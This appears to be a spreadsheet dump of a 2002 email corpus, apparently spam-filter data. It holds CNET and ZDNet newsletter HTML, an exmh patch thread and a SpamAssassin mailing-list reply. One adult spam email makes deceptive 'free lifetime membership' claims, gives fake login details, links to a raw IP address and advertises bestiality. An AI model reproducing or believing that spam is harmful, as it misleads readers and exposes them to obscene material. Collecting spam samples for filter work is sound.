 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;1&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgDZBmo4WSjg0SxiPZvH6lR" &gt;Gene Kan&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
    Gnutella open-source guru Gene Kan, who died on June
    29 in an apparent suicide, was clearly beloved by the CNET
    community. Last week, search requests for information on
    25-year-old Kan far outweighed the kind of requests on
    products and companies I usually see. A pioneer in the
    peer-to-peer space, many credit him with legitimizing file
    sharing--making it about more than music, according to Wired
    News.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;2&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMW4gxMQtE6tTbDS-BJjho4R" &gt;Macworld&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
    The annual Apple lovefest in New York is always a
    good show, whether or not Steve Jobs has anything real to
    announce. So far, it looks like Apple has already surprised a
    few by announcing the release of QuickTime 6.0 (see No. 7),
    which many thought would get bogged down in a licensing
    quagmire.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;3&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOs8dGmMSxCs3CyJqsjeorR" &gt;PayPal&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
    It's been a rocky road thus far for the eBay and
    PayPal deal. Soon after eBay announced it was buying PayPal
    for $1.5 billion, shareholders filed a lawsuit claiming that
    PayPal's price tag was too low. This week, PayPal is being
    subpoenaed by the New York attorney general in regard to its
    involvement with online gambling transactions.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;4&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjTZPsvKmHg3F-erCpGY9iR" &gt;Wi-Fi&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
    I'm just going to leave this common term for 802.11 up
    on the Buzz Meter permanently. This time, Wi-Fi is getting
    interest because of a possible pact between tech heavyweights,
    including Intel, AT&amp;amp;T Wireless, and Verizon Communications, to
    build wireless access places across the nation in public areas
    where people would want to launch onto the Net, such as
    airports.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;5&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQTqzGejK3Rl28NRQSnqQPR" &gt;eMac&lt;/a&gt;:&lt;/b&gt;&lt;br&gt;
    This is the for-education-only computer that consumers
    wanted so badly that Apple released it to them. The CNET
    review is out, and here's the word: the eMac is what the iMac
    used to be. Basically, it's an easy-to-use, fairly inexpensive
    computer for users who don't need to do much besides word
    processing and accessing the Web.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td colspan="2" align="left"&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 For more Buzz, &lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQi8Bx4v9qDFWVhZSgRXBnR" &gt;click here&lt;/a&gt;.
 &lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt; 
 &lt;/td&gt;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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=48-ggsbzRBpVdwCyNf7__1Q1FD9nc3p49RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage my subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0w8sJtgMBobvZm5yGKIaZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUenorNRgfrqMtNXjoCKqdR"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href="http://clickthru.online.com/Click?q=87-izDOQ8n4W17INUleplrQ8kasp4eR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanVDfco_EYlXdIl9Oi-UiyR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0MIp9rWSUr9i_f_B0NLnlR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLJOc4lhgmWdT_pfmeDx04R" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEJi8NOw3gvpmtTwxp6DtrR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWgaJyD07Zr2fqfAgMcXeaiR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e404-02&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=06-fPCunn83hKf4T0DD4-QtRz1ub9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: zzzz@spamassassin.taint.org
</t>
  </si>
  <si>
    <t xml:space="preserve">New Account For: zzzz@spamassassin.taint.org
 ##################################################
 #                                                #
 #          Free XXX Links .org is a              #
 #          non-profit organization               #
 #                                                #
 #           Offering the best in                 #
 #       adult entertainment for free.            #
 #                                                #
 ##################################################
 &gt;&gt;&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW
 &gt;&gt;&gt;&gt;&gt;  Your User Name And Password:
 &gt;&gt;&gt;&gt;&gt;  User Name: zzzz@spamassassin.taint.org
 &gt;&gt;&gt;&gt;&gt;  Password: 818932
 Test it out NOW!   Adults Farm
 http://rd.yahoo.com/*http://80.71.71.88/farm/?aid=818932
 Girls and Animals Getting Freaky....FREE Lifetime Membership!!
 6 of the Best Adult Sites on the Internet for FREE!
 ---------------------------------------
 NEWS 09/05/02
 With just over 3.9 Million Members that signed up for FREE, Last month there were 894,457 New
 Members. Are you one of them yet???
 ---------------------------------------
 Our Membership FAQ
 Q. Why are you offering free access to 6 adult membership sites for
 free?
 A. I have advertisers that pay me for ad space so you don't have to pay
 for membership.
 Q. Is it true my membership is for life?
 A. Absolutely you'll never have to pay a cent the advertisers do.
 Q. Can I give my account to my friends and family?
 A. Yes, as long they are over the age of 18.
 Q. Do I have to sign up for all 6 membership sites?
 A. No just one to get access to all of them.
 Q. How do I get started?
 A. Click on one of the following links below to become a member.
 - These are multi million dollar operations with policies and rules.
 - Fill in the required info and they won't charge you for the Free pass!
 - If you don't believe us, just read their terms and conditions.
 ---------------------------
 # 6. &gt; XXX Adults Farm
 http://rd.yahoo.com/*http://80.71.71.88/farm/?aid=818932
 Girls and Animals Getting Freaky....FREE Lifetime Membership!!
 # 5. &gt; Sexy Celebes Porn
 http://rd.yahoo.com/*http://80.71.71.88/celebst/?aid=818932
 Thousands Of XXX Celebes doing it...FREE Lifetime Membership!!
 # 4. &gt; Play House Porn
 http://rd.yahoo.com/*http://80.71.71.88/play/?aid=818932
 Live Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!
 # 3. &gt; Asian Sex Fantasies
 http://rd.yahoo.com/*http://80.71.71.88/asian/?aid=818932
 Japanese Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!
 # 2. &gt; Lesbian Lace
 http://rd.yahoo.com/*http://80.71.71.88/lesbian/?aid=818932
 Girls and Girls Getting Freaky! ...FREE Lifetime Membership!!
 # 1. &gt; New! just added today: Mage Porn Site
 http://rd.yahoo.com/*http://80.71.71.88/mega/?aid=818932
 950,00 Pics, 90,000 Movies, Live Sex Shows... FREE Lifetime Membership!!
 --------------------------
 Jennifer Simpson, Miami, FL
 Your FREE lifetime membership has entertained my boyffriend and I for
 the last two years!  Your Adult Sites are the best on the net!
 Joe Morgan Manhattan, NY
 Your live sex shows and live sex cams are unbelievable. The best part
 about your porn sites, is that they're absolutely FREE!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http://rd.yahoo.com/*http://80.71.71.88/optout/ . Please allow 24 hours for removal.
 mdnfhmobawljhlqtotlhpikemcywuc
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Patch to complete a change...
</t>
  </si>
  <si>
    <t xml:space="preserve">Done
 &gt;&gt;&gt;Robert Elz said:
  &gt; I suspect that as part of Chris' set of changes, he cleaned up the
  &gt; use of the variable that was named "L" in FtocCommit (in ftoc.tcl).
  &gt; Its name got changed from L to lineno
  &gt; 
  &gt; But there's one reference of $L left.   That causes tracebacks if
  &gt; you attempt to use "link" with the current CVS version of exmh.
  &gt; 
  &gt; I guess that most of us don't use "link" very often ... I noticed it
  &gt; last week, but only got time to look and see why today.
  &gt; 
  &gt; If someone with the ability to commit to the CVS repository would
  &gt; apply the following patch (to lib/ftoc.tcl) that would be nice.
  &gt; (It works... and is trivial, and you could perhaps just apply it by
  &gt; making the change with an editor faster than saving this patch and
  &gt; applying it - there's only one instance of $L in the file, that
  &gt; should be changed to $lineno)
  &gt; 
  &gt; kre
  &gt; 
  &gt; 
  &gt; --- ftoc.tcl.PREV	Wed Aug 21 15:01:48 2002
  &gt; +++ ftoc.tcl	Tue Sep 10 12:47:06 2002
  &gt; @@ -1131,9 +1131,9 @@
  &gt;  		}
  &gt;  	    }
  &gt;  	    incr ftoc(numMsgs) -1
  &gt;  	} else {
  &gt; -	    FtocUnmarkInner $L
  &gt; +	    FtocUnmarkInner $lineno
  &gt;  	}
  &gt;  	incr ftoc(changed) -1
  &gt;      }
  &gt;      if {$delmsgs != {}} {
  &gt; 
  &gt; --==_Exmh_16073047980--
 --
 Brent Welch
 Software Architect, Panasas Inc
 Pioneering the World's Most Scalable and Agile Storage Network
 www.panasas.com
 welch@panasas.com
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Urban Boquist wrote:
 &gt; If I run spamassassin on this message:
 &gt; 
 &gt;    http://www.boquist.net/stort-sup-brev
 &gt; 
 &gt; it seems to hang. Memory usage goes up to 73MB and stays there. I have
 &gt; let it run for an hour before I killed it. This was on a
 &gt; Pentium-II-366. Yes, I know, a bit slow, but still...
 &gt; 
 &gt; Can anyone else confirm this hang? Maybe I should just upgrade...
 Don't run SA on mails this large. Most people tend to ignore mails 
 larger than about 250K in spamassassin processing, because it just kills 
 performance. There are some known issues with the parsing (such as the 
 HTML parsing stuff which is much improved in 2.40 which we're soon to 
 release), but nothing that's too likely to be fixed by 2.40. Perhaps in 
 2.50 though.
 Matt.
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">
  &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;ZDNet AnchorDesk Daily Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body style=3D"margin:8px 9px 9px 12px" bgcolor=3D"#ffffff" background=3D"h=
 ttp://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link=3D"#003399" ali=
 nk=3D"#cc0000" vlink=3D"#666699"&gt;
 &lt;div align=3D"center"&gt;
 &lt;a name=3D"top"&gt;&lt;/a&gt;
 &lt;!-- Logo and ad banner --&gt;
 &lt;table width=3D612 bgcolor=3D"#232850" cellpadding=3D0 cellspacing=3D0 bord=
 er=3D0&gt;
 &lt;tr valign=3Dbottom&gt;
 &lt;td width=3D440 colspan=3D4&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=
 =3Dab-ZcQKQYpdinCImwyXydit0M-0OvrR" &gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/newsletters/hd_anchor.gif" width=3D"440" height=3D"60" border=3D"0"  al=
 t=3D"AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D160 align=3Dcenter valign=3Dtop rowspan=3D2 bgcolor=3D"#ffffff"=
 &gt;
        &lt;br&gt;
         &lt;!--tower --&gt;
       &lt;div align=3D"center"&gt;&lt;img src=3D"http://i.i.com.com/cnwk.1d/Ads/comm=
 on/advertisement.gif" width=3D"120" height=3D"10" border=3D"0"&gt;&lt;/br&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dc1-PIljQpWqZ4c33UjwiOPYOLi=
 pujlR" target=3D"new"&gt;  =20
 &lt;img src=3D"http://www.techrepublic.com/images/ads/ban_160x600_domainsgirl3=
 .gif" width=3D"160" height=3D"600" border=3D"0"&gt;
 &lt;/a&gt;&lt;/div&gt;
         &lt;!-- tower --&gt;
                 &lt;br&gt;   =20
  &lt;table cellpadding=3D1 cellspacing=3D0 border=3D0 width=3D"156" bgcolor=3D=
 "#cccccc"&gt;&lt;tr&gt;&lt;td&gt;
                 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D"=
 154" bgcolor=3D"#ffffff"&gt;
                 &lt;tr&gt;
                         &lt;td width=3D6&gt;&lt;img src=3D"http://www.zdnet.com/grap=
 hics/anchordesk/frontpage/b.gif" width=3D"6" height=3D"1" border=3D"0"&gt;&lt;br&gt;=
 &lt;/td&gt;
                         &lt;td width=3D145&gt;
                         &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                         &lt;img src=3D"http://www.zdnet.com/graphics/anchordes=
 k/frontpage/b.gif" width=3D"1" height=3D"4" border=3D"0"&gt;&lt;br&gt;
                        =20
   &lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/header2_sh=
 ameless2.gif" width=3D"145" height=3D"20" vspace=3D6&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dd6-yw2KQMP=
 dL6mVSHPnOIRzw0LGkk4R" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/b&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" h=
 eight=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Deb-HlpoQkD=
 FMhDs2Pndo6MzbuNK5xrR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/b&gt;&lt;/fo=
 nt&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1=
 " height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D00-4FQlI9Q=
 kZ2_8PB9bgi4cHr7W6TiR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Find out the top 10 Web services security requirements at Tech Update.&lt;/b&gt;&lt;=
 /font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=
 =3D"1" height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D15-mYP_IGc=
 k22zinwfAV-hDEc2lRbPR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;=
 /b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" wid=
 th=3D"1" height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D2a-CNuWIrI=
 PMgp4sWBabman8WccrYnR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Check out thousands of IT job listings in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" h=
 eight=3D"6"&gt;&lt;br&gt;
          &lt;br&gt;
                         &lt;/td&gt;
                         &lt;td width=3D3&gt;&lt;img src=3D"http://www.zdnet.com/grap=
 hics/anchordesk/frontpage/b.gif" width=3D"3" height=3D"1" border=3D"0"&gt;&lt;br&gt;=
 &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
        =20
 &lt;/td&gt;
 &lt;td width=3D12 colspan=3D3 valign=3Dbottom&gt;&lt;img src=3D"http://www.zdnet.com=
 /techupdate/i/gl_corner2.gif" width=3D"12" height=3D"6" border=3D"0" alt=3D=
 ""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign=3Dtop&gt;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width=3D428 bgcolor=3D"#ffffff"&gt;
                 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D4=
 28 bgcolor=3D"#ffffef"&gt;
                         &lt;tr valign=3Dtop&gt;
                         &lt;td width=3D10&gt;&lt;img src=3D"http://www.zdnet.com/gra=
 phics/anchordesk/frontpage/b.gif" alt=3D"" width=3D"10" height=3D"1" border=
 =3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td valign=3D"top" width=3D252&gt;
                        =20
                         &lt;img src=3D"http://www.zdnet.com/graphics/anchordes=
 k/frontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                                 &lt;font face=3D"Arial, Helvetica" size=3D"-2"=
 &gt;MON JUL 15, 2002&lt;/font&gt;&lt;br&gt;                                               =
      =20
                         &lt;img src=3D"http://www.zdnet.com/graphics/anchordes=
 k/frontpage/b.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                        =20
                         &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
        =20
                =20
                            &lt;table cellpadding=3D0 cellspacing=3D0 border=3D=
 0 width=3D83 align=3Dleft&gt;
                 &lt;tr valign=3Dtop&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/authors/144.gif" alt=3D"David Coursey" width=3D"75" height=3D"105" =
 border=3D"0"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;                                      =20
                 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#fff49f"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;David Coursey&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/trim_yellow.gif" width=3D"23" height=3D"15" border=3D"0"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D1=
 60&gt;
                 &lt;tr&gt;&lt;td bgcolor=3D"#fff49f"&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;tr&gt;&lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordes=
 k/frontpage/b.gif" height=3D5 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;font size=3D"3"&gt;&lt;a href=3D"http://clickthru.online.com/Cli=
 ck?q=3D3f-4sAEIqMWSOfOZy1Hcoh57BymNzeR" &gt;&lt;b&gt;Dear Steve Jobs: At Macworld, s=
 how me this...&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/=
 clear.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                 I'm headed to NYC for Macworld Expo. Steve Jobs usually mak=
 es big announcements at these shows--last time around it was those cool new=
  iMacs. I don't know what he's got up his sleeve this time, but here's what=
  I'm hoping for.&lt;p&gt;
         =20
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D55-TAHaIKJ=
 8NI9Nyl4qm86ccJ_2d2ZR" &gt;&lt;b&gt;NOTE: Why we're changing our publishing schedule=
 &lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage=
 /b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D6a-z_30IeW=
 iBSF69cHzceCGFySNP8dR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: From Apple's Jaguar to E=
 d McMahon&lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/=
 frontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
          &lt;/td&gt;
                         &lt;td width=3D8&gt;&lt;img src=3D"http://www.zdnet.com/grap=
 hics/anchordesk/frontpage/b.gif" alt=3D"" width=3D"8" height=3D"1" border=
 =3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td width=3D1 bgcolor=3D"#FFF7AD"&gt;&lt;img src=3D"http:=
 //www.zdnet.com/graphics/anchordesk/frontpage/b.gif" alt=3D"" width=3D"1" h=
 eight=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td width=3D8 bgcolor=3D"#FFFFFF"&gt;&lt;img src=3D"http:=
 //www.zdnet.com/graphics/anchordesk/frontpage/b.gif" alt=3D"" width=3D"8" h=
 eight=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td width=3D143 bgcolor=3D"#FFFFFF"&gt;
                                 &lt;img src=3D"http://www.zdnet.com/graphics/a=
 nchordesk/frontpage/b.gif" alt=3D"" width=3D"1" height=3D"10" border=3D"0"&gt;=
 &lt;br&gt;
   &lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/header2_mo=
 reon.gif" width=3D"150" height=3D"20" border=3D"0" vspace=3D5 alt=3D"More o=
 n AnchorDesk"&gt;&lt;br&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;
        =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D7f-bn6KIIP6RGjvuSo=
 9IO3JewkhBpuR" &gt;Tech bids for security money... Fridge viruses... USA Today=
  hacked &lt;/a&gt;&lt;p&gt;
         =20
        =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D94-rOVNQaI7VZVT6HI=
 J5elUjfr5JQyR" &gt;The many ways YOU'D change Microsoft Office &lt;/a&gt;&lt;p&gt;
         =20
        =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3Da9-IlbqQpUxnePiQlI=
 z2JQZv91zVMlR" &gt;Wanna combo PDA/cell phone? Here's what to look for&lt;/a&gt;&lt;p&gt;
                =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3Dbe-B7ixQCpTpr7DXfx=
 bnY9y52GfwH4R" &gt;How to defrag your hard drive--and speed up your PC&lt;/a&gt;&lt;p&gt;
                  &lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/front=
 page/b.gif" height=3D4 width=3D1&gt;&lt;br&gt;
                         &lt;/td&gt;
                         &lt;td width=3D8 bgcolor=3D"#FFFFFF"&gt;&lt;img src=3D"http:=
 //www.zdnet.com/graphics/anchordesk/frontpage/b.gif" alt=3D"" width=3D"8" h=
 eight=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;/table&gt;&lt;br&gt;
 =20
        =20
         &lt;!-- ### --&gt; &lt;table width=3D"100%"  cellpadding=3D"0" cellspacing=
 =3D"0" border=3D"0" bgcolor=3D"#ffffff"&gt; &lt;tr bgcolor=3D"#999999"&gt;&lt;td colspa=
 n=3D"7" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ffffff=
 " size=3D"-2"&gt;y&lt;b&gt;Crucial Clicks: More from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;=
  &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/gra=
 phics/anchordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt; &lt;td rowspan=3D=
 "3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" h=
 eight=3D1 width=3D5&gt;&lt;/td&gt; &lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" height=3D5 width=3D1&gt;&lt;/td&gt; &lt;td rowsp=
 an=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.g=
 if" height=3D1 width=3D5&gt;&lt;/td&gt; &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img s=
 rc=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 =
 width=3D1&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr valign=3D"top"&gt; &lt;td width=3D"100%"&gt;       &lt;table =
 width=3D"100%"  cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;        &lt;t=
 r&gt;&lt;td colspan=3D"3"&gt;&lt;font face=3D"verdana, geneva" color=3D"#333333" size=
 =3D"-2"&gt;&lt;b&gt;PDAS&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/a=
 nchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;        &lt;tr=
  valign=3D"top"&gt;       &lt;td width=3D"85"&gt;&lt;a href=3D"http://clickthru.online.=
 com/Click?q=3Dd3-GZHkQJPaYHkih6jK74p01K7fy3rR" &gt;&lt;img src=3D"http://www.zdne=
 t.com/products/graphics/060502_Palmapps.jpg" width=3D"85" height=3D"110" bo=
 rder=3D"0" alt=3D"" /&gt;&lt;/a&gt;&lt;/td&gt;   &lt;td width=3D"5"&gt;&lt;img src=3D"http://www.zd=
 net.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;    =
     &lt;td width=3D"100%"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3De9-gdzpQxVzw920P86TRnU3P83P5XlR" =
 style=3D"text-decoration:none"&gt;&lt;b&gt;An industry first&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;ZDNet revi=
 ewers take a look at Toshiba's e740, the first PDA with Intel's new XScale =
 processor and integrated Wi-Fi connectivity.&lt;/font&gt;&lt;/td&gt;        &lt;/tr&gt;   &lt;tr=
 &gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fro=
